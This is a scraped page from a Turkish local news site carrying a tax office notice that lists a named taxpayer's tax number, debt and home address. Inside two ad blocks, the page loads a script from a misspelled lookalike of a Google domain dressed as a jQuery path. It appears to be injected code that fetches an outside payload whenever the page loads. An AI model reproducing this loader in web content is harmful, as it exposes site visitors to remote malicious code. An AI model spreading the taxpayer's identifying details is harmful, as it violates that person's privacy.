data-action="like" data-show-faces="true" data-share="true"></div> </div> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> </div> </div> <div class="span3 karakterislem secilemez"> <i class="glyphicons-icon text_smaller"></i> <i class="glyphicons-icon text_bigger"></i> <i class="glyphicons-icon font"></i> <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a> </div> </div> <div id="newstext" class="row-fluid page-content"> <div class="reklam reklam132 haber"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- haber resim altı --> <ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-5471929680897605" data-ad-slot="6876227685"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> <script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div> <div class="reklam reklam134 text-center"><object type="application/x-shockwave-flash" data="http://www.elbistaninsesi.com/images/banner/polatlar-opet.swf" width="200" height="200"><param name="movie" value="http://www.elbistaninsesi.com/images/banner/polatlar-opet.swf" /></object></div> <div class="reklam reklam135 text-center"><object type="application/x-shockwave-flash" data="http://www.elbistaninsesi.com/images/banner/ceren4_1.swf" width="600" height="200"><param name="movie" value="http://www.elbistaninsesi.com/images/banner/ceren4_1.swf" /></object></div> <div itemprop="articleBody" id="newsbody"><p class="MsoNoSpacing" style="text-indent:35.4pt"><span style="font-size:10.0pt;&#10;mso-bidi-font-size:11.0pt;font-family:&quot;Arial&quot;,&quot;sans-serif&quot;">Aşağıda isimleri yazılı mükelleflerin bilinen adreslerine posta ile tebliğ yapılamadığından ilan yazısının askıya çıkarıldığı tarihi izileyen 15'nci gün Vergi Usul Kanunu'nun 104. maddesi gereği ilen edilmiş olur. İlan tarihinden başlayarak bir ay içinde bizzat veya bilvekale müracaat etmeleri veyahut taahhütlü mektup veya telgrafla açık adreslerini bildirmeleri halinde kendilerine süre kayıtlı resmi tebliğ yapılacağı, ilan tarihinden başlayarak bir ay içinde dairemize başvurulmaması veya adreslerini bildirmemeleri halinde bir ayın sonunda tebliğ yapılmış sayılacağı Vergi Usul Kanunu'nun 103.-106 maddelerine göre ilen olunur.<o:p></o:p></span></p> <p class="MsoNoSpacing"><span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;&#10;font-family:&quot;Arial&quot;,&quot;sans-serif&quot;">MÜKELLEFİN <o:p></o:p></span></p> <p class="MsoNoSpacing"><span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;&#10;font-family:&quot;Arial&quot;,&quot;sans-serif&quot;">ADI SOYADI/ÜNVANI&#160;&#160; VERGİ NO&#160;&#160;&#160;&#160;&#160;&#160;&#160; BELGE NEV'İ&#160;&#160; BELGE NO&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; VERGİ/CEZA TÜRÜ&#160;&#160;&#160;&#160;&#160; MİKTARI&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; DÖNEM&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; BİLİNEN EN SON ADRESİ<o:p></o:p></span></p> <p class="MsoNoSpacing"><span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;&#10;font-family:&quot;Arial&quot;,&quot;sans-serif&quot;">ATİLLA ŞAHİN&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; 7900034172&#160;&#160;&#160;&#160;&#160; V/C İHB.&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; 20160518135070000003&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; 0076&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; 8.257,00&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; 2015/05-2015/05&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; ORHANGAZİ MAH. AĞAÇLIK SK. NO:7 ELBİSTAN / K.MARAŞ<o:p></o:p></span></p> <p class="MsoNoSpacing"><span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;&#10;font-family:&quot;Arial&quot;,&quot;sans-serif&quot;">ATİLLA ŞAHİN&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; 7900034172&#160;&#160;&#160;&#160;&#160; V/C İHB.&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; 20160518135070000003&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; 3080&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; 8.257,00&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; 2015/05-2015/05&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; ORHANGAZİ MAH. AĞAÇLIK SK. NO:7 ELBİSTAN / K.MARAŞ<o:p></o:p></span></p> <p class="MsoNoSpacing" style="text-indent:35.4pt"><span style="font-size:10.0pt;&#10;mso-bidi-font-size:11.0pt;font-family:&quot;Arial&quot;,&quot;sans-serif&quot;">Elbistan Vergi Dairesi Müdürlüğü mükelleflerine ait olup yukarıda adı, soyadı ve ünvanı yazılı mükellefler adına salınan vergi ve cezalar nedeniyle tanzim edilen ihbarnameler bilinen adreslerinde bulunamamaları nedeniyle tebliğ edilemediğinden 213 Sayılı Vergi Usul Kanunu'nun 103-106. maddelerine istinaden ilgililerin ilan tarihinden başlayarak bir ay içerisinde vergi dairesine bizzat veya bilvekale müracatta bulunmaları veyahut taahhütlü mektup ve telgrafla açık adreslerini bildirmeleri halinde kendilerine süre ile kayıtlı resmi tebliğ yapılacağı bir ayın sonunda müracaatta bulunmayan veya açık adreslerini bildirmeyenler hakkında iş bu ilanın neşri tarihinden itibaren bir ayın sonunda tebliğ yapılmış sayılacağı ilan olunur.<o:p></o:p></span></p> <p class="MsoNoSpacing"><span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;&#10;font-family:&quot;Arial&quot;,&quot;sans-serif&quot;">Basın: 514080 <o:p></o:p></span></p> <p class="MsoNoSpacing"><span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;&#10;font-family:&quot;Arial&quot;,&quot;sans-serif&quot;">&#160;</span></p></div> </div> </article> <div class="row-fluid galleries"> <div class="title"> <span>İlgili Galeriler</span><hr> </div> <div class="content"> <div class="span3"> <a href="http://www.elbistaninsesi.com/elbistan-tarihi-organizeye-ev-sahipligi-yapti-resimleri,38.html" title="Elbistan, tarihi organizeye ev sahipliği yaptı"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_5431.jpg" alt="Elbistan, tarihi organizeye ev sahipliği yaptı" /> <b>Elbistan, tarihi organizeye ev sahipliği yaptı</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/donatir-mobilyadan-hediye-yagmuru-resimleri,37.html" title="Donatır Mobilya’dan hediye yağmuru"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/donatYr_mobilya_cekiliY_1.jpg" alt="Donatır Mobilya’dan hediye yağmuru" /> <b>Donatır Mobilya’dan hediye yağmuru</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/otomobilde-yanarak-can-verdiler-resimleri,36.html" title="Otomobilde yanarak can verdiler"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_8860.jpg" alt="Otomobilde yanarak can verdiler" /> <b>Otomobilde yanarak can verdiler</b> </a> </div> </div> </div> <div id="yorumyap" style="margin:0"></div> <div class="row-fluid keywords"><div class="title">Anahtar Kelimeler:</div></div> <section> <div id="yorumlar"> <ul class="nav nav-tabs" id="ytab"> <li class="active"><a href="#yorumpanel" data-toggle="tab">Yorum Gönder <span class="label label-important">0</span></a></li> </ul> <div class="tab-content"> <div class="tab-pane active" id="yorumpanel"> <div class="yorumlar panel"> <div id="yorumpaneli" class="row-fluid"> <form name="comment" class="comment_form" id="addcomment"> <div class="span1"> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" class="img-rounded"/> </div> <div class="span11"> <div class="row-fluid"> <div class="input-prepend span6"> <span class="add-on">Adınız</span> <input name="isim" class="span10 adsoyad" type="text" id="adsoyad" size="30" maxlength="50" title="Ad soyad gerekli!" /> </div> </div> <textarea name="yorum" maxlength="1000" class="span12" id="comment_field" onkeyup="textKey(this.form)" placeholder="Yorum yazmak için bu alanı kullanabilirsiniz. Yorum yazarken lütfen aşağıda yazılan uyarıları göz önünde bulundurunuz!"></textarea> <div class="span12" style="margin:0;"> <div class="answer span5" style="display:none;">Yanıt: <b>@name</b> <a href="javascript:void(0)" class="kaldir">x</a></div> <a type="button" href="javascript:void(0)" onclick="javascript:comment_send(37216);return false;" class="btn btn-warning pull-right">Yorum Gönder</a> <div class="karakter span4 pull-right">Kalan Karakter: <input name="character" id="character" disabled size="3" value="1000"></div></div> </div> <input type="hidden" name="hid" value="37216" /> <input type="hidden" name="uid" value="0" /> <input type="hidden" name="tip" value="haber" /> <input type="hidden" name="cevap" value="" class="answer" /> <input type="hidden" name="cevap_id" value="0" class="cevap_id" /> <input type="hidden" name="token" value="e709b30b4fade77b80068758bad836cf01f55f9c" /> </form> </div> <div class="alert">Yorumunuz onaylanmak üzere yöneticiye iletilmiştir.<a class="close" data-dismiss="alert" href="#">&times;</a></div> </div> <div class="alert alert-block alert-error fade in" style="display:block;margin-top:15px;"> <button type="button" class="close" data-dismiss="alert">×</button> <strong>Dikkat!</strong> Suç teşkil edecek, yasadışı, tehditkar, rahatsız edici, hakaret ve küfür içeren, aşağılayıcı, küçük düşürücü, kaba, pornografik, ahlaka aykırı, kişilik haklarına zarar verici ya da benzeri niteliklerde içeriklerden doğan her türlü mali, hukuki, cezai, idari sorumluluk içeriği gönderen Üye/Üyeler’e aittir. </div> </div> <!-- .tab-pane --> </div> <!-- .tab-content --> </div> <!-- #yorumlar --> </section> </div> <!-- Sağ Blok --> <div id="sidebar" class="aside span4"> <!-- ILGILI HABERLER --> <div id="ilgiliHaberler-y"> <div class="ilgiliHaberler-y-t glyphicons show_big_thumbnails">İlgili Haberler</div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/ihale-ilanlari/kesme-ve-taslama-taslarinin-alimi-h37204.html" title="KESME VE TAŞLAMA TAŞLARININ ALIMI"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/kesme_ve_taslama_taslarinin_alimi_h37204_8dae9.jpg" alt="KESME VE TAŞLAMA TAŞLARININ ALIMI" /> <span>KESME VE TAŞLAMA TAŞLARININ ALIMI</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/ihale-ilanlari/akaryakit-satin-alinacaktir-h37180.html" title="AKARYAKIT SATIN ALINACAKTIR"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/akaryakit_satin_alinacaktir_h37180_fff9e.jpg" alt="AKARYAKIT SATIN ALINACAKTIR" /> <span>AKARYAKIT SATIN ALINACAKTIR</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/ihale-ilanlari/tc-elbistan-icra-dairesi-h37179.html" title="T.C. ELBİSTAN İCRA DAİRESİ"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/tc_elbistan_icra_dairesi_h37179_555c9.jpg" alt="T.C. ELBİSTAN İCRA DAİRESİ" /> <span>T.C. ELBİSTAN İCRA DAİRESİ</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/ihale-ilanlari/tc-elbistan-icra-dairesi-h37135.html" title="T.C. ELBİSTAN İCRA DAİRESİ"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/tc_elbistan_icra_dairesi_h37135_f9cb9.jpg" alt="T.C. ELBİSTAN İCRA DAİRESİ" /> <span>T.C. ELBİSTAN İCRA DAİRESİ</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/ihale-ilanlari/tc-elbistan-icra-dairesi-h37134.html" title="T.C. ELBİSTAN İCRA DAİRESİ"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/tc_elbistan_icra_dairesi_h37134_490ae.jpg" alt="T.C. ELBİSTAN İCRA DAİRESİ" /> <span>T.C. ELBİSTAN İCRA DAİRESİ</span> </a> </div> </div> <div id="syazar"> <div class="header"> <h5><a style="margin-top:10px;" href="http://www.elbistaninsesi.com/seri-ilanlar/ilanver.html" class="this pull-left btn btn-small" title="İlan Ekle"><i class="halflings-icon plus"></i> İlan Ekle</a> <a style="margin-right:65px;font-size:140%;color:red;" href="http://www.elbistaninsesi.com/seri-ilanlar" title="Seri İlanlar">Seri İlanlar</a></h5> <a class="control left" href="#" id="syprev"></a> <a class="control right" href="#" id="synext"></a> </div> <div class="content"> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-kaloferli-daire-170m2-3635.html" title="kiralik kaloferli daire 170m2" >kiralik kaloferli daire 170m2</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-kaloferli-daire-170m2-3635.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="kiralik kaloferli daire 170m2" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/2katli-mustakil-ev-haltarafi-3634.html" title="2katlı mustakıl ev haltarafı" >2katlı mustakıl ev haltarafı</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/2katli-mustakil-ev-haltarafi-3634.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="2katlı mustakıl ev haltarafı" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/tasolukta-imarli-arsa-3633.html" title="TAŞOLUKTA İMARLI ARSA" >TAŞOLUKTA İMARLI ARSA</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/tasolukta-imarli-arsa-3633.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="TAŞOLUKTA İMARLI ARSA" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/tasolukta-imarli-arsa-3631.html" title="TAŞOLUKTA İMARLI ARSA" >TAŞOLUKTA İMARLI ARSA</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/tasolukta-imarli-arsa-3631.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="TAŞOLUKTA İMARLI ARSA" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/sahibinden-cok-temiz-toyato-13-corolla-life-3630.html" title="SAHİBİNDEN ÇOK TEMİZ TOYATO 1,3 COROLLA LİFE" >SAHİBİNDEN ÇOK TEMİZ TOYATO 1,3 COROLLA LİFE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/sahibinden-cok-temiz-toyato-13-corolla-life-3630.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/a1818b964b87e4a6a13ba742f5fc466c60c1490a.jpg" alt="SAHİBİNDEN ÇOK TEMİZ TOYATO 1,3 COROLLA LİFE" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/31-tokide-kiralik-daire-3629.html" title="3+1 TOKİDE KİRALIK DAİRE" >3+1 TOKİDE KİRALIK DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/31-tokide-kiralik-daire-3629.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="3+1 TOKİDE KİRALIK DAİRE" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/anadolu-lisesi-civari-kiralik-daire-3628.html" title="Anadolu lisesi civarı kiralık daire" >Anadolu lisesi civarı kiralık daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/anadolu-lisesi-civari-kiralik-daire-3628.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Anadolu lisesi civarı kiralık daire" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satlik-2-katli-mustkil-ev-3623.html" title="satlık 2 katlı mustkil ev" >satlık 2 katlı mustkil ev</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satlik-2-katli-mustkil-ev-3623.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="satlık 2 katlı mustkil ev" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daire-3622.html" title="KİRALIK DAİRE" >KİRALIK DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daire-3622.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="KİRALIK DAİRE" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daireler-3621.html" title="kiralık daireler" >kiralık daireler</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daireler-3621.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="kiralık daireler" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daire-kaloriferli-3619.html" title="KİRALIK DAİRE KALORİFERLİ" >KİRALIK DAİRE KALORİFERLİ</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daire-kaloriferli-3619.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/7312e9979b35cba522cec68c30da32de96ee8893.jpg" alt="KİRALIK DAİRE KALORİFERLİ" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/elbistan-pinarbasi-nda-satilik-arsa-3615.html" title="Elbistan Pınarbaşı&#039;nda Satılık Arsa" >Elbistan Pınarbaşı&#039;nda Satılık Arsa</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/elbistan-pinarbasi-nda-satilik-arsa-3615.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Elbistan Pınarbaşı&#039;nda Satılık Arsa" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/pinarbasi-gocart-ustunde-satilik-arsa-3614.html" title="Pınarbaşı Gocart üstünde satılık arsa" >Pınarbaşı Gocart üstünde satılık arsa</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/pinarbasi-gocart-ustunde-satilik-arsa-3614.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Pınarbaşı Gocart üstünde satılık arsa" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daire-31-3612.html" title="kiralik daire 3+1" >kiralik daire 3+1</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daire-31-3612.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="kiralik daire 3+1" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/imar-plani-icinde-tarla-3607.html" title="İmar planı içinde Tarla" >İmar planı içinde Tarla</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/imar-plani-icinde-tarla-3607.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="İmar planı içinde Tarla" class="img-rounded" /></a> </div> </div> </div> </div> </div> <div id = "nobetci"> <a href="http://www.elbistaninsesi.com/images/dosyalarim/eczane.jpg" title="Nöbetçi Eczane" target="_blank"><img src = "http://www.ugurmumcu.info.tr/wp-content/uploads/2014/05/rb-eczane.png"></a> </div> <!-- NAMAZ VAKITLERI --> <div class="namazvakitleri"> <div class="title"> <h5>Namaz Vakitleri</h5> <select name="namaz" onchange="namaz_vakitleri(this.value); " class="span5 pull-right"> <option value="adana" >Adana</option> <option value="adiyaman" >Adıyaman</option> <option value="afyon" >Afyon</option> <option value="agri" >Ağrı</option> <option value="aksaray" >Aksaray</option> <option value="amasya" >Amasya</option> <option value="ankara" >Ankara</option> <option value="antalya" >Antalya</option> <option value="ardahan" >Ardahan</option> <option value="artvin" >Artvin</option> <option value="aydin" >Aydın</option> <option value="balikesir" >Balıkesir</option> <option value="bartin" >Bartın</option> <option value="batman" >Batman</option> <option value="bayburt" >Bayburt</option> <option value="bilecik" >Bilecik</option> <option value="bingol" >Bingöl</option> <option value="bitlis" >Bitlis</option> <option value="bolu" >Bolu</option> <option value="burdur" >Burdur</option> <option value="bursa" >Bursa</option> <option value="canakkale" >Çanakkale</option> <option value="cankiri" >Çankırı</option> <option value="corum" >Çorum</option> <option value="denizli" >Denizli</option> <option value="diyarbakir" >Diyarbakır</option> <option value="duzce" >Düzce</option> <option value="edirne" >Edirne</option> <option value="elazig" >Elazığ</option> <option value="erzincan" >Erzincan</option> <option value="erzurum" >Erzurum</option> <option value="eskisehir" >Eskişehir</option> <option value="gaziantep" >Gaziantep</option> <option value="giresun" >Giresun</option> <option value="gumushane" >Gümüşhane</option> <option value="hakkari" >Hakkari</option> <option value="hatay" >Hatay</option> <option value="igdir" >Iğdır</option> <option value="isparta" >Isparta</option> <option value="istanbul" >İstanbul</option> <option value="izmir" >İzmir</option> <option value="kahramanmaras" selected>Kahramanmaraş</option> <option value="karabuk" >Karabük</option> <option value="karaman" >Karaman</option> <option value="kars" >Kars</option> <option value="kastamonu" >Kastamonu</option> <option value="kayseri" >Kayseri</option> <option value="kirikkale" >Kırıkkale</option> <option value="kirklareli" >Kırklareli</option> <option value="kirsehir" >Kırşehir</option> <option value="kilis" >Kilis</option> <option value="izmit" >Kocaeli</option> <option value="konya" >Konya</option> <option value="kutahya" >Kütahya</option> <option value="malatya" >Malatya</option> <option value="manisa" >Manisa</option> <option value="mardin" >Mardin</option> <option value="mersin" >Mersin</option> <option value="mugla" >Muğla</option> <option value="mus" >Muş</option> <option value="nevsehir" >Nevşehir</option> <option value="nigde" >Niğde</option> <option value="ordu" >Ordu</option> <option value="osmaniye" >Osmaniye</option> <option value="rize" >Rize</option> <option value="adapazari" >Sakarya</option> <option value="samsun" >Samsun</option> <option value="siirt" >Siirt</option> <option value="sinop" >Sinop</option> <option value="sivas" >Sivas</option> <option value="sanliurfa" >Şanlıurfa</option> <option value="sirnak" >Şırnak</option> <option value="tekirdag" >Tekirdağ</option> <option value="tokat" >Tokat</option> <option value="trabzon" >Trabzon</option> <option value="tunceli" >Tunceli</option> <option value="usak" >Uşak</option> <option value="van" >Van</option> <option value="yalova" >Yalova</option> <option value="yozgat" >Yozgat</option> <option value="zonguldak" >Zonguldak</option> </select> </div> <div class="content"> <div class="sonuc"> <table cellspacing="0" cellpadding="0" id="vakitler"> <tr> <th>İmsak</th> <th>Güneş</th> <th>Öğle</th> <th>İkindi</th> <th>Akşam</th> <th>Yatsı</th> </tr> <tr> <td>05:55</td> <td>07:36</td> <td>12:42</td> <td>15:11</td> <td>17:29</td> <td>18:58</td> </tr> </table> </div> </div> </div> <div class="reklam reklam208"><iframe name=BIKADV src="http://medya.ilan.gov.tr/widgets/YYN-001260-20160610.html" width="300" height="175" frameborder="0" scrolling="no"></iframe> <script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div><a href="http://www.accuweather.com/tr/tr/elbistan/318373/current-weather/318373" class="aw-widget-legal"> <!-- By accessing and/or using this code snippet, you agree to AccuWeather’s terms and conditions (in English) which can be found at http://www.accuweather.com/en/free-weather-widgets/terms and AccuWeather’s Privacy Statement (in English) which can be found at http://www.accuweather.com/en/privacy. --> </a><div id="awtd1452737033699" class="aw-widget-36hour" data-locationkey="318373" data-unit="c" data-language="tr" data-useip="false" data-uid="awtd1452737033699" data-editlocation="false"></div><script type="text/javascript" src="http://oap.accuweather.com/launch.js"></script> <!-- ENCOKLAR --> <div class="encoklar"> <div class="accordion"> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne"> <span class="encoklar-icon"><i class="halflings-icon white fire"></i></span><h5>Bu Ay Çok Okunanlar</h5></a> </div> <div id="collapseOne" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/guncel/elbistanli-2-polis-memuru-hain-saldirida-yaralandi-h37068.html" title="Elbistanlı 2 polis memuru hain saldırıda..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/elbistanli_2_polis_memuru_hain_saldirida_yaralandi_h37068_c1cc4.jpg" alt="Elbistanlı 2 polis memuru hain saldırıda..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/elbistanli-2-polis-memuru-hain-saldirida-yaralandi-h37068.html" title="" ><span class="en-hit">1.</span> <strong>Elbistanlı 2 polis memuru hain saldırıda...</strong> <span class="en-spot en-hidden">İstanbul&#039;da 38 şehit verilen terör saldırısında Elbistanlı...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/dag-iiyi-elbistanli-sehide-ithaf-ettiler-h37190.html" title="DAĞ IIyi Elbistanlı şehide ithaf..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/dag_iiyi_elbistanli_sehide_ithaf_ettiler_h37190_2726c.jpg" alt="DAĞ IIyi Elbistanlı şehide ithaf..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/dag-iiyi-elbistanli-sehide-ithaf-ettiler-h37190.html" title="" ><span class="en-hit">2.</span> <strong>DAĞ II’yi Elbistanlı şehide ithaf...</strong> <span class="en-spot en-hidden">Kod adı ‘Fırtına Getiren’ olan ve 7 kişilik bordo bereli MAK timinin...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/afsinli-polis-memuru-sehit-oldu-h37158.html" title="Afşinli polis memuru şehit oldu" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/afsinli_polis_memuru_sehit_oldu_h37158_c682b.jpg" alt="Afşinli polis memuru şehit oldu" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/afsinli-polis-memuru-sehit-oldu-h37158.html" title="" ><span class="en-hit">3.</span> <strong>Afşinli polis memuru şehit oldu</strong> <span class="en-spot en-hidden">İstanbul’un Ümraniye ilçesinde HDP ilçe binasına yönelik protesto...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/52-gunluk-yasam-mucadelesini-kaybetti-h37144.html" title="52 günlük yaşam mücadelesini kaybetti" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/52_gunluk_yasam_mucadelesini_kaybetti_h37144_383da.jpg" alt="52 günlük yaşam mücadelesini kaybetti" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/52-gunluk-yasam-mucadelesini-kaybetti-h37144.html" title="" ><span class="en-hit">4.</span> <strong>52 günlük yaşam mücadelesini kaybetti</strong> <span class="en-spot en-hidden">Elbistan-Çoğulhan Karayolu Çatova Mahallesi girişinde meydana gelen...</span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/guncel/okullara-kar-tatili-geldi-h37201.html" title="Okullara kar tatili geldi" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/okullara_yarin_icin_kar_tatili_geldi_h37201_831bb.Jpeg" alt="Okullara kar tatili geldi" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/okullara-kar-tatili-geldi-h37201.html" title="" ><span class="en-hit">5.</span> <strong>Okullara kar tatili geldi</strong> <span class="en-spot en-hidden">Elbistan’da gece saatlerinde başlayan ve etkisini sürdüren kar yağışı...</span></a></div></li> </ul> </div> </div> </div> <div 